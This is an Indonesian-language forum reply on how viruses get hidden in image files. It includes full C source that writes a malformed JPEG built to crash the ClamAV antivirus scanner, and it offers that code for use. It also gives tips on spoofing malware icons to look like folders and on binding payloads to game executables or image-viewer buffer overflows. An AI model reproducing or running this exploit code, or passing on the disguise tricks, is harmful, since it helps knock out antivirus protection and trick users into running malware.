
Originally Posted by
Kerrigan2nd
oooh jadi gini ya caranya ngumpetin virus di pic....
wah, bisa dicoba nih...
makasih bro

smile:
wah bukan bro.. emg prinsipnya binding tp ga dieksekusi bareng.. misal km sisipin file executable virus di dlm jpg jg tetep ga bisa dieksekusi si file executableny,. jadi ga da gunanya klo mau infeksi virus ke org lain pake cara ini.. klo yg sering kita liat file virus bisa ada di file gambar itu ada beberapa cara :
- jpeg exploit, ini klasik bgt, waktu taun 94-95 hebohnya.. yg baru2 ini vulner di ClamAV, ada file jpeg yg bisa buat tu AV tewas.. ni ad source codeny klo mau..
Code:
const char crashstr[] = "\xff\xd8" // jpg marker
"\xff\xed" // exif data
"\x00\x02" // length
"Photoshop 3.0\x00"
"8BIM"
"\x04\x0c" // thumbnail id
"\x00"
"\x01"
"\x01\x01\x01\x01"
"0123456789012345678912345678"; // skip over 28 bytes
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#define NR_ITER 200000
int main() {
FILE *fp;
int i;
fp = fopen("clamav-jpeg-crash.jpg", "w+");
if (!fp) {
printf("can't open/create file\n");
exit(0);
}
for (i = 0; i < NR_ITER; i++) {
fwrite(crashstr, sizeof(crashstr)-1/*don't want 0-byte ?*/, 1,
fp);
}
fclose(fp);
printf("done, now run clamscan on ./clamav-jpeg-crash.jpg\n");
exit(0);
}
nah ada lagi trik
- spoofing icon, tapi jarang org buat virus spoofing icon ke icon jpeg..soalnya di thumbnail kliatan palsuny, jd mreka biasanya pilih spoofing ke icon yg mirip folder.
1 lagi tekniknya, dibinding ke executable lain..misal game, kalo di binding ke jpeg tar dieksekusinya pake aplikasi utk buka gambar..nahh executablenya bakal ga bisa dieksekusi, terkecuali bindingnya manfaatin celah buffer di aplikasi buat buka gambar tadi (ini yg disebut exploit buffer)
Share This Thread